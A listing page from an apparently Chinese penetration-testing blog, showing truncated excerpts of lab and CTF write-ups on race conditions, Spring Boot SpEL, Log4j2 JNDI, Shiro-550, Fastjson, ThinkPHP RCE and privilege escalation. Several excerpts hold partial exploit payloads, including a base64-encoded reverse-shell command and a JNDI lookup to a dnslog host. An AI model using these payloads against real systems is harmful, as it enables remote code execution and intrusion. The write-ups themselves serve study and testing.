AU9U5T's blog
  • Home
  • Archives
  • Categories
  • Tags
  • About

条件竞争

[第五空间 2021]EasyCleanup0x00 条件竞争 session 上传文件写webshell 0x01 发现有另两种方式可以利用,一种是使用eval 或者是使用 文件包含 可以发现使用命令执行的话限制挺大的 既然可以看phpinfo 就尝试看一下phpinfo 发现session 是支持 0x02 尝试使用session 实现文件包含 然后尝试用session文件包含,
2024-02-15
#CTF刷题记录

条件竞争

简介可以理解为多线程中,没有对一个资源进行上锁处理,发现竞争 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。说的通俗一点,条件竞争涉及到的就是操作系统中所提到的进程或者线程同步的问题,当一个程序的运行的结果依赖于线程的顺序,处
2024-02-15
#CTF

应用程序提权

MySQL提权利用场景目标主机开启MySQL远程连接,并且攻击者已经获得MySQL数据库连接的用户名和密码信息,通过 UDF手工提权获得操作系统管理员权限。 拥有数据库账号密码,可以远程连接数据 拥有Webshell,可以连接数据库 能够写文件 可以操作数据库 如果获取数据库的密码 找到数据库的配置文件 通过webshell 对数据库进行本地爆破 msf 或者专门爆破数据库
2024-02-15
#渗透

springBoot漏洞整理

springboot-spel-rce0x00 漏洞发现 这个是模拟的查找的书的一个页面 发现存在漏洞,因为6*2 已经被计算了 0x01 尝试利用这个漏洞 攻击者使用nc 开启监听 构造一个反弹shell 的指令 将这个构造成字节码 然后构造payload 发送 1http://192.168.79.128:9091/article/?id=${T(java.lang.Run
2024-02-14
#整理

log4j2漏洞整理

CVE-2021-442280x00 漏洞发现 发现这个,然后尝试验证是否存在漏洞 1http://IP地址:端口/solr/admin/cores?action=${jndi:ldap://9xovk0.dnslog.cn} 指定ip 端口 发现已经被解析 尝试测试java 版本 0x01 发现可以使用jndi 注入的方式进行利用 使用攻击机监听端口 1234
2024-02-14
#整理

域环境权限提升

简介 域环境提权,就是从普通域用户权限到域控管理权限 域渗透的主要目标就是拿下域控管理权限,拿下域控制器,进而拿下整个域 域内的权限提升更像是横向移动,只要获取到了域控的权限就拿到了所有的主机 MS14-068漏洞简介 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 漏洞原理 服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控DC验证PA
2024-02-14
#渗透

Shiro漏洞整理

Shiro-5500x00 发现漏洞 发现shiro 登录页面 0x01 尝试利用 使用ysoserial.jar 1java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTI
2024-02-13
#整理

fastjson漏洞整理

Fastjson_1.2.45 0x00 检测是否存在 存在漏洞,尝试利用 0x01 使用工具 发现成功的
2024-02-13
#整理

渗透测试框架提权

msfmetepreter 提权在有一个Session的条件之下,直接使用getsystem自动提权 发现成功提权 返回之前的权限 获取hash值是可以使用管理员权限,但是如果想要获取明文密码就需要获取system权限了 如果是高版本的windwos 就会发现提权不了 尝试了解getsystem的原理是什么 如果发现操作失败,可以通过获取当前session 能使用什么方式进行提权(local
2024-02-13
#渗透

Thinkphp漏洞整理

漏洞复现Thinkphp5.0.20_RCE0x00 随便访问一个路径,然后获取报错信息 5.0.* 版本 thinkphp相关工具扫描结果发现路由过滤不严谨 那就直接使用payload 尝试 1/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put
2024-02-12
#整理
1…1415161718…36

Search

github 随笔
Views: Visitors: